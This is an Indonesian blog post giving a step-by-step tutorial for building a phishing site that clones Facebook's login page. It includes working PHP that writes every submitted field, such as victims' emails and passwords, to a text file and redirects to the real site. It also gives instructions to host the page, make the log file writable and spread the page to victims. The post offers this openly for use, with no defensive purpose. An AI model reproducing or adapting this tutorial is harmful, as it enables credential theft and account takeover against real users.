Wednesday, 21 December 2011

Tips membuat web phising

Langkah-langkahnya yaitu

  1. Cari dan buka alamat yang mau dijadikan homepage/halaman utama Web Phising anda. misal http://www.facebook.com.
  2. Setelah halaman terbuka sepenuhnya anda tekal tombol “Ctrl + U” di keyboard secara bersamaan. Kemudian akan muncul Source Code.
  3. Copy semua Source Code tersebut. Tekan “Ctrl + A(untuk blok semua source code) kemudian tekan “Crtl + C(untuk meng-copy / menyaslin Source Code tersebut).
  4. Setelah itu buka notepad/wordpad (Start – all program – accessories- Notepad/Wordpad)  di WINDOWS atau gedit (Applications –  Accessories – Gedit Text Editor) di LINUX.
  5. Paste Source Code (ctrl + v) yang sudah di copy tadi. seperti langkah nomor 3.
  6. Cari menggunakan “Crtl + F”, isi dengan “action=(tanpa tanda petik)
  7. Ketemu
    1<form action="fb.com" method="post">
  8. Ganti fb.com” (contoh) dengan “phising.php”.
  9. Ubah “postmenjadi “GET“.
  10. Save as (file – Save as) atau tekan “Ctrl + S”. Berinama dengan “index.html” dan File Type pilih “All FIle”
  11. .Buka notepad lagi (langkah sama seperti nomor 4).
  12. Copy Paste Code PHP ini ke notepad :
    1<?php header("Location: http://fb.com"); $handle = fopen("passwords.txt", "a"); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>
  13. Ganti “http://fb.com” dengan “http://facebook.com” misal (tanpa tanda kutip).
  14. Save dengan nama phising dan extensi .php jadinya phising.php (Caranya sama seperti langkah no. 10)
  15. Upload ke hosting anda. (Silahkan cari hosting gratis atau berbayar, tidak disarankan menggunakan Hosting Gratis 000webhost untuk membuat web phising. Namun jika ingin tahu Cara Upload File di Free Hosting 000webhost silahkan baca saja. Satu lagi, pastikan domain anda sudah mengarah ke hosting anda. Jika anda tidak mengerti silahkan pelajari tentang Domain dan Hosting terlebih dahulu.
  16. Setelah ke-3 file berhasil di upload jangan lupa permission/chmod di atur 777 untuk file passwords.txt, agar password yang di ketikan oleh korban dapat tersimpan.
  17. Selesai. Silahkan Coba akes Domain anda dan apa yang anda lihat ? Jika tampilan mirip seperti halaman ketika anda membuka website yang anda tiru berarti benar.
  18. Silahkan anda test apakah WebPhising buatan anda sukses dapat menyimpan email dan password korban.
  19. Jika berhasil menyimpan informasi login korban seperti email dan password, waktunya sebarkan web phising anda dengan kecerdikan anda.
Sekian dulu postingan cara membuat web phising apabila anda masih bingung jangan malu bertanya.

0 komentar:

Post a Comment

◄ Posting Baru Posting Lama ►